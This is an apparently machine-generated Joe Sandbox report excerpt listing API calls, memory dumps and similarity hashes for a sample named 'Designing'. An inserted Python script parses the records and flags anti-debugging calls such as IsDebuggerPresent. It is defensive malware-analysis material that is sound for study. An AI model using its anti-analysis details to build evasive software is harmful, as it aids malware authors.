• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
• Opcode ID: 621285ca53ca4c780596ddf87d16907b46325f30e73d1e07c54bbe9968d9f0f5
• Instruction ID: d8eb35d40054c7838f1816346700dfdb41dc11b810ed55d2571a09e2d2fde8da
• Opcode Fuzzy Hash: 621285ca53ca4c780596ddf87d16907b46325f30e73d1e07c54bbe9968d9f0f5
• Instruction Fuzzy Hash: CEF0443494030FF78F00BAA4E846F9ABB6C9A00754B588129B915E7592EF70EA558AF0
APIs
• GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00E28D52
• TerminateProcess.KERNEL32(00000000), ref: 00E28D59
• FreeLibrary.KERNEL32(?,?,?,?), ref: 00E28F3A
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Process$CurrentFreeLibraryTerminate
• String ID:
• API String ID: 146820519-0
• Opcode ID: 0682edf0f29cacb7853de2fd968598b118246c7ffa675e1be387b5aa62c899a4
• Instruction ID: 06f0c16d8c37694873e1ce44e6070addba36b5f322bf519e0050e4d739cb1ade
• Opcode Fuzzy Hash: 0682edf0f29cacb7853de2fd968598b118246c7ffa675e1be387b5aa62c899a4
• Instruction Fuzzy Hash: 65128C71A08310DFD714CF28C584B6ABBE5FF89318F04995DE889AB252CB30ED45CB92
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: _wcslen$_strcat
• String ID:
• API String ID: 306214811-0
• Opcode ID: 43ff1c9919307c20f369ddcea1395dbe3e8c4534876518922cb9f6b25c2f4fde
• Instruction ID: 0e3085f161a651e0f44e018ee9938b1a181ff84f30583dc619fade18a220363f
• Opcode Fuzzy Hash: 43ff1c9919307c20f369ddcea1395dbe3e8c4534876518922cb9f6b25c2f4fde
• Instruction Fuzzy Hash: 86A15B31600515DFCB18DF18D5D29A9BBE1FF45314B60A4AEE84A9F292DB31ED42CF90
APIs
  • Part of subcall function 00DA61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DA6299
• KillTimer.USER32(?,00000001,?,?), ref: 00DBFD36
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DBFD45
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DFFE33
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: IconNotifyShell_Timer$Kill
• String ID:
                                                                                                                                                                              • API String ID: 3500052701-0
                                                                                                                                                                              • Opcode ID: 0380846cd7dccc1981e26396a11bb7b47fbf2d265dd688b0b2fba16ce313e8b7
                                                                                                                                                                              • Instruction ID: ac9d88573053eb7fceb221014a001753dff3b60dc41b1f187f600bf5c8264eee
                                                                                                                                                                              • Opcode Fuzzy Hash: 0380846cd7dccc1981e26396a11bb7b47fbf2d265dd688b0b2fba16ce313e8b7
                                                                                                                                                                              • Instruction Fuzzy Hash: 34319571904348AFEB32CF249C55BE6BBEC9F02308F0444AEE6DA57242D7745A85CB61
                                                                                                                                                                              APIs
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,00DD894C,?,00E69CE8,0000000C), ref: 00DD8A84
                                                                                                                                                                              • GetLastError.KERNEL32(?,00DD894C,?,00E69CE8,0000000C), ref: 00DD8A8E
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00DD8AB9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2583163307-0
                                                                                                                                                                              • Opcode ID: 0eaf0b37284d6da230fa237be271964a68934379cfdedc0d301333f640468013
                                                                                                                                                                              • Instruction ID: 474027a773552171b9b432c22a1aa62d7c6e650967229a392f158ca6eec86e51
                                                                                                                                                                              • Opcode Fuzzy Hash: 0eaf0b37284d6da230fa237be271964a68934379cfdedc0d301333f640468013
                                                                                                                                                                              • Instruction Fuzzy Hash: 74012B326055606AD7266238BC46B7E67498B81734F3E115BF9289B3D2DF30CD8461B0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00DD97BA,FF8BC369,00000000,00000002,00000000), ref: 00DD9744
                                                                                                                                                                              • GetLastError.KERNEL32(?,00DD97BA,FF8BC369,00000000,00000002,00000000,?,00DD5ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00DC6F41), ref: 00DD974E
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00DD9755
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2336955059-0
                                                                                                                                                                              • Opcode ID: 34c4a7f4657cd4ff96a5d32cf189fa9fd2cf5f84a78931ab0b1b32535582d671
                                                                                                                                                                              • Instruction ID: 36ab188dfb2be45276a35ca313297231174c34513cb1c26bb600aa68f622a17f
                                                                                                                                                                              • Opcode Fuzzy Hash: 34c4a7f4657cd4ff96a5d32cf189fa9fd2cf5f84a78931ab0b1b32535582d671
                                                                                                                                                                              • Instruction Fuzzy Hash: 05014032620115BFCB059F99EC05DAE7B1ADB85330B38024AF86197390EA71DD4187B0
                                                                                                                                                                              APIs
                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DA3A3C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: IconNotifyShell_
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1144537725-0
                                                                                                                                                                              • Opcode ID: 82a51fc1186b133d165add016302a39125bafc23ea654602a04273e73cfd6ef7
                                                                                                                                                                              • Instruction ID: d5309208d8f84607bc2efca103f3acbd9b1519d41fb39981a99bcf3aaf089309
                                                                                                                                                                              • Opcode Fuzzy Hash: 82a51fc1186b133d165add016302a39125bafc23ea654602a04273e73cfd6ef7
                                                                                                                                                                              • Instruction Fuzzy Hash: 0C31A570504701DFD320DF25D884797BBE8FB49308F04092EF6D997281E775A988CB62
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsThemeActive.UXTHEME ref: 00DA333D
                                                                                                                                                                                • Part of subcall function 00DA32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00DA32FB
                                                                                                                                                                                • Part of subcall function 00DA32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DA3312
                                                                                                                                                                                • Part of subcall function 00DA338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00DA3368,?), ref: 00DA33BB
                                                                                                                                                                                • Part of subcall function 00DA338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00DA3368,?), ref: 00DA33CE
                                                                                                                                                                                • Part of subcall function 00DA338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00E72418,00E72400,?,?,?,?,?,?,00DA3368,?), ref: 00DA343A
                                                                                                                                                                                • Part of subcall function 00DA338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00E72418,?,?,?,?,?,?,?,00DA3368,?), ref: 00DA34BB
                                                                                                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00DA3377
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1550534281-0
                                                                                                                                                                              • Opcode ID: 941f814d2cf772b85b27aaab46cbd44d60bbc6ee7090834b78263f3e3679a40a
                                                                                                                                                                              • Instruction ID: abfac2b3ea5655282914ba0ecdbcc90b43ec8bdc9fe1cc71ee250f400ce8d275
                                                                                                                                                                              • Opcode Fuzzy Hash: 941f814d2cf772b85b27aaab46cbd44d60bbc6ee7090834b78263f3e3679a40a
                                                                                                                                                                              • Instruction Fuzzy Hash: F5F05E31558346BFD700EFB2FC0AB243BA5E701719F04481DB60DAA0E2DBBA91D89B74
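The record above is the one an analyst stops at: a subcall of the theme/foreground setup routine calls IsDebuggerPresent, and the SystemParametersInfoW actions 0x2000 and 0x2001 are SPI_GETFOREGROUNDLOCKTIMEOUT and SPI_SETFOREGROUNDLOCKTIMEOUT. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses function records in this report's format, lists the APIs per function, flags anti-analysis calls (the API list is this example's own choice), names the SPI action and SPIF flags, and decodes the dotted fields of the .sdmp file names. The field layout (process index, snapshot, dump id, base address, page protection, unknown, memory type, unknown) is an assumption inferred from the values on this page, where the code region carries 0x20 and 0x01000000 and the writable data region 0x04. SAMPLE is constructed from the records above.

```python
"""Triage helpers for Joe Sandbox per-function records (the APIs / Memory Dump
Source / Similarity blocks): Win32 calls per function, anti-analysis tells among
them, and what the .sdmp name says about the dumped region. Added example, not
part of the report; the anti-analysis list and the .sdmp field layout are this
example's own assumptions (see comments)."""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE = """\
APIs
• IsThemeActive.UXTHEME ref: 00DA333D
  • Part of subcall function 00DA32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00DA32FB
  • Part of subcall function 00DA32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DA3312
  • Part of subcall function 00DA338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00DA3368,?), ref: 00DA33CE
• SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00DA3377
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
Similarity
• Opcode ID: 941f814d2cf772b85b27aaab46cbd44d60bbc6ee7090834b78263f3e3679a40a
APIs
• CloseHandle.KERNEL32(00000000,00000000,?,?,00DD894C,?,00E69CE8,0000000C), ref: 00DD8A84
• __dosmaperr.LIBCMT ref: 00DD8AB9
"""  # constructed sample, copied from the record format of the report

API_RE = re.compile(r"(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
                    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)")
# Assumption: the APIs this example treats as anti-debug / anti-VM tells.
ANTI_ANALYSIS = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent", "OutputDebugStringW",
                 "BlockInput", "GetSystemFirmwareTable", "EnumSystemFirmwareTables"}
SPI = {0x2000: "SPI_GETFOREGROUNDLOCKTIMEOUT", 0x2001: "SPI_SETFOREGROUNDLOCKTIMEOUT"}
SPIF = {0x1: "SPIF_UPDATEINIFILE", 0x2: "SPIF_SENDCHANGE"}
PAGE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
        0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int                      # call-site address from "ref:"
    via_subcall: Optional[str]    # address of the subcall the API is reached through

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    dump_file: Optional[str] = None
    opcode_id: Optional[str] = None

def parse_records(text: str) -> list:
    """One FunctionRecord per 'APIs' block; bullets and indentation are dropped."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ")
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.search(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"]))
        elif line.startswith("Source File:"):
            cur.dump_file = line.split(":", 1)[1].split(",", 1)[0].strip()
        elif line.startswith("Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
    return records

def anti_analysis_hits(rec: FunctionRecord) -> list:
    return sorted({c.api for c in rec.calls if c.api in ANTI_ANALYSIS})

def describe_spi(call: ApiCall) -> Optional[str]:
    """Name the SystemParametersInfoW action (arg 0) and fWinIni flags (arg 3)."""
    if call.api != "SystemParametersInfoW" or not call.args or call.args[0] == "?":
        return None
    name = SPI.get(int(call.args[0], 16), "SPI_" + call.args[0])
    if len(call.args) > 3 and call.args[3] != "?":
        bits = int(call.args[3], 16)
        flags = [n for b, n in SPIF.items() if bits & b]
        if flags:
            name += " | " + "|".join(flags)
    return name

def decode_sdmp_name(name: str) -> dict:
    """Assumed layout, inferred from this report's values (code region is 0x20 +
    0x01000000, .data is 0x04): proc.snapshot.id.base.protect.?.memtype.?.sdmp"""
    f = name.rsplit(".sdmp", 1)[0].split(".")
    if len(f) != 8:
        raise ValueError("unexpected .sdmp name: " + name)
    prot, mtype = int(f[4], 16), int(f[6], 16)
    return {"process": int(f[0], 16), "snapshot": int(f[1], 16), "base": int(f[3], 16),
            "protection": PAGE.get(prot, hex(prot)), "mem_type": MEM.get(mtype, hex(mtype))}

def triage(text: str) -> list:
    """Per-function summary: APIs, anti-analysis hits, decoded SPI actions, region."""
    return [{"opcode_id": r.opcode_id, "apis": [c.api for c in r.calls],
             "anti_analysis": anti_analysis_hits(r),
             "spi": [s for s in map(describe_spi, r.calls) if s],
             "region": decode_sdmp_name(r.dump_file) if r.dump_file else None}
            for r in parse_records(text)]
```

Run `triage(open("report.txt").read())` over the copied record text to get one summary per function; the first SAMPLE record yields the IsDebuggerPresent hit, the get/set pair on the foreground lock timeout (the set with SPIF_SENDCHANGE), and a code region mapped as PAGE_EXECUTE_READ / MEM_IMAGE, which agrees with "based on PE: true". Opcode ID is kept so hits can be correlated across samples that share the same function body.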
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseHandleSleep
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 252777609-0
                                                                                                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                              • Instruction ID: 76249fcee10ecf54158c32ce7e3b59517bc64cb4a9f9c5f94ab6152a0d703ebe
                                                                                                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                              • Instruction Fuzzy Hash: 4631D570A00106DFC718CF58D480F69FBA5FB49301B2986A9E449CB256D732EDC1EBE0
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00DACEEE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Init_thread_footer
• String ID:
• API String ID: 1385522511-0
Similarity
• API ID: LoadString
• String ID:
• API String ID: 2948472770-0
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• CharLowerBuffW.USER32(?,?), ref: 00E0FCCE
Similarity
• API ID: BuffCharLower
• String ID:
• API String ID: 2358735015-0
APIs
  • Part of subcall function 00DA663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DA668B,?,?,00DA62FA,?,00000001,?,?,00000000), ref: 00DA664A
  • Part of subcall function 00DA663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DA665C
  • Part of subcall function 00DA663E: FreeLibrary.KERNEL32(00000000,?,?,00DA668B,?,?,00DA62FA,?,00000001,?,?,00000000), ref: 00DA666E
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00DA62FA,?,00000001,?,?,00000000), ref: 00DA66AB
  • Part of subcall function 00DA6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DE5657,?,?,00DA62FA,?,00000001,?,?,00000000), ref: 00DA6610
  • Part of subcall function 00DA6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DA6622
  • Part of subcall function 00DA6607: FreeLibrary.KERNEL32(00000000,?,?,00DE5657,?,?,00DA62FA,?,00000001,?,?,00000000), ref: 00DA6635
Similarity
• API ID: Library$Load$AddressFreeProc
• String ID:
• API String ID: 2632591731-0
APIs
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
APIs
  • Part of subcall function 00DD4FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00DD319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00DD5031
• _free.LIBCMT ref: 00DD53DF
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                              • Instruction ID: 117e032fff8d1bc3a8dd38d8ad9aafd42a227cf7f56fde6381ba281b64949045
                                                                                                                                                                              • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                              • Instruction Fuzzy Hash: C3F0F47250062156DA323B6ADC01FAA3799CF82330F14072FF465932D1EF74E9028AF2
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 176396367-0
                                                                                                                                                                              • Opcode ID: 13e3f34f1ad86e8f32c6ece7b2ba72061abb35dc4d657d1d9fbb59e66f0b5d4f
                                                                                                                                                                              • Instruction ID: 58d54f1e98942697642e568129e214de3293765bb5bc95f3c6addbb4893f64ce
                                                                                                                                                                              • Opcode Fuzzy Hash: 13e3f34f1ad86e8f32c6ece7b2ba72061abb35dc4d657d1d9fbb59e66f0b5d4f
                                                                                                                                                                              • Instruction Fuzzy Hash: 42F0C8B3601705AED7149F69D806F66BF98EB44360F14812EFA19CB1D1DB31E5108BB0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00E1F987
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: EnvironmentVariable
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1431749950-0
                                                                                                                                                                              • Opcode ID: a6b57fcec0a29022eaa53e090f51e2b172550d127d9689b58600c365c78894a5
                                                                                                                                                                              • Instruction ID: 219dbaae776fac7bf95487badd5b6313b02b01304e177383df8789821ddb17de
                                                                                                                                                                              • Opcode Fuzzy Hash: a6b57fcec0a29022eaa53e090f51e2b172550d127d9689b58600c365c78894a5
                                                                                                                                                                              • Instruction Fuzzy Hash: E5F03176600205BFCB01EBA5DC46E9FBBB8EF95710F044059F505EB261DA70AA41CB71
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00DD319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00DD5031
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
